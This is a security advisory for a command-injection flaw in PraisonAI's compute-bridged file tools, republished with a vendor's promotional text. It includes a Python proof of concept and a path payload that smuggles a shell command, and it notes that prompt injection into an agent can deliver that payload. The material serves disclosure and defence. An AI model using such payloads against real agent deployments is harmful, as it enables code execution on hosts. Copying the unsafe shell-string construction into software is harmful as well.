Summary
Compute-bridged file tools allow shell command injection
LocalManagedAgent / SandboxedAgent compute bridging wrapsread_file, list_files, and write_file when a compute provider is
attached. The bridge converts those file operations into shell command strings
using raw path arguments, then sends those strings to shell-backed compute
providers.
An attacker who can influence a file-tool path argument can break out of the
quoted path and execute arbitrary shell commands in the compute environment.
With compute="local", commands execute through the local subprocess compute
provider on the host. With Docker, commands execute in the container.
Affected Product
- Repository:
MervinPraison/PraisonAI - Package:
praisonai - Component:
src/praisonai/praisonai/integrations/managed_local.py - Confirmed affected:
v4.6.10v4.6.56v4.6.57- current
mainat2f9677abb2ea68eab864ee8b6a828fd0141612e1
- Confirmed not affected:
v4.6.9v4.6.1v4.5.149
- Suggested affected range:
>= 4.6.10, <= 4.6.57
Root Cause
Current managed_local.py defines the bridged tool set:
compute_bridged_tools = {"execute_command", "read_file", "write_file", "list_files"}
For file tools, _bridge_file_tool() constructs shell command strings:
command = f'cat "{filepath}"'
command = f'ls -la "{directory}"'
command = f'cat > "{filepath}" << "EOF"\n{content}\nEOF'
The local compute provider executes the string withasyncio.create_subprocess_shell(...); the Docker compute provider executes it
with ["sh", "-c", command].
The bridge keeps the low-risk read_file / list_files tool names and
signatures while changing their execution primitive into shell interpretation.
Why This Is Not Intended Behavior
Compute bridging itself is documented and intentional. The vulnerability is
that file path data is interpreted as shell syntax.
The normal read_file and list_files implementations treat the same payload
as a literal path and do not expand shell metacharacters. The approval registry
also marks execute_command as critical, while read_file and list_files
are not dangerous-tool entries.
Local PoV
The PoV is local-only and harmless. It uses an environment canary and compares
normal file tools against compute-bridged file tools.
Minimal inline reproducer:
import os
from pathlib import Path
from praisonai.integrations.managed_local import LocalManagedAgent, LocalManagedConfig
from praisonaiagents.tools import list_files, read_file
workdir = Path(".prai-cand-006-pov-workdir")
workdir.mkdir(exist_ok=True)
(workdir / "safe.txt").write_text("SAFE_CONTENT\n", encoding="utf-8")
canary = "PRAISONAI_CAND_006_COMMAND_EXECUTED"
os.environ["PRAI_CAND_006_CANARY"] = canary
payload = 'missing"; printf "$PRAI_CAND_006_CANARY"; #'
# Control: normal file tools treat the payload as a literal path.
normal_read = read_file(str(workdir / payload))
normal_list = str(list_files(str(workdir) + '"; printf "$PRAI_CAND_006_CANARY"; #'))
cfg = LocalManagedConfig(
name="prai-cand-006-poc",
tools=["read_file", "list_files"],
working_dir=str(workdir),
)
managed = LocalManagedAgent(config=cfg, compute="local")
tools = {tool.__name__: tool for tool in managed._resolve_tools()}
bridged_read = tools["read_file"](payload)
bridged_list = tools["list_files"]('."; printf "$PRAI_CAND_006_CANARY"; #')
print("normal_read_contains_canary", canary in normal_read)
print("normal_list_contains_canary", canary in normal_list)
print("bridged_read_contains_canary", canary in bridged_read)
print("bridged_list_contains_canary", canary in bridged_list)
Command:
python3 \
submission-bundle/praisonai-prai-cand-006-compute-file-tool-command-injection/poc/prai_cand_006_compute_file_tool_command_injection.py \
--repo artifacts/repos/praisonai-current
Current-head result:
{
"describe": "v4.6.57-4-g2f9677ab",
"vulnerable": true,
"normal_controls": {
"read_file_payload_contains_canary": false,
"list_files_payload_contains_canary": false
},
"bridged_results": {
"read_file_payload_contains_canary": true,
"list_files_payload_contains_canary": true
},
"approval_registry": {
"execute_command_risk": "critical",
"read_file_risk": null,
"list_files_risk": null
}
}
The payload used by the PoV is:
missing"; printf "$PRAI_CAND_006_CANARY"; #
Normal read_file treats this as a literal missing filename. The bridged tool
constructs:
cat "missing"; printf "$PRAI_CAND_006_CANARY"; #"
and returns the canary from the compute shell.
Suggested Severity
The vector assumes an attacker has low-privilege access to an agent interface
that can request file-tool use. If a deployment exposes such an agent without
authentication, PR:N may be appropriate.
Impact
An application that exposes a PraisonAI agent using LocalManagedAgent orSandboxedAgent with a compute provider and a restricted file-tool set can be
tricked into executing shell commands through a path argument to read_file orlist_files.
This can bypass least-privilege tool configuration and tool-approval
expectations. A prompt-injection path, chat endpoint, automation webhook, or
other user-controlled agent task can supply the file path argument without the
operator granting execute_command.
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
GHSA-W6H2-FR4Q-XVXV has a CVSS score of 8.8 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.6.59); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Do not implement file operations by constructing shell command strings from
path/content arguments.
Preferred fix:
- Add provider-native file APIs for read, write, and list operations, or pass
arguments as structured argv where the provider supports it. - Preserve the normal file-tool path validation and workspace boundary checks
for compute-bridged file tools. - Treat
write_filecontent as data, not shell source. The current heredoc
construction is also unsafe if content can contain the delimiter. - Add regression tests that use paths containing
",;,$(), backticks,
newline, and#and assert no shell execution occurs. - Keep
execute_commandas the only bridge path that intentionally accepts a
shell command string, with critical approval semantics.
A minimal stopgap is to remove read_file, list_files, and write_file fromcompute_bridged_tools until safe provider-native file operations exist.
Frequently Asked Questions
- What is GHSA-W6H2-FR4Q-XVXV? GHSA-W6H2-FR4Q-XVXV is a high-severity OS command injection vulnerability in praisonai (pip), affecting versions >= 4.6.10, <= 4.6.58. It is fixed in 4.6.59. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is GHSA-W6H2-FR4Q-XVXV? GHSA-W6H2-FR4Q-XVXV has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of praisonai are affected by GHSA-W6H2-FR4Q-XVXV? praisonai (pip) versions >= 4.6.10, <= 4.6.58 is affected.
- Is there a fix for GHSA-W6H2-FR4Q-XVXV? Yes. GHSA-W6H2-FR4Q-XVXV is fixed in 4.6.59. Upgrade to this version or later.
- Is GHSA-W6H2-FR4Q-XVXV exploitable, and should I be worried? Whether GHSA-W6H2-FR4Q-XVXV is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-W6H2-FR4Q-XVXV is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-W6H2-FR4Q-XVXV? Upgrade
praisonaito 4.6.59 or later.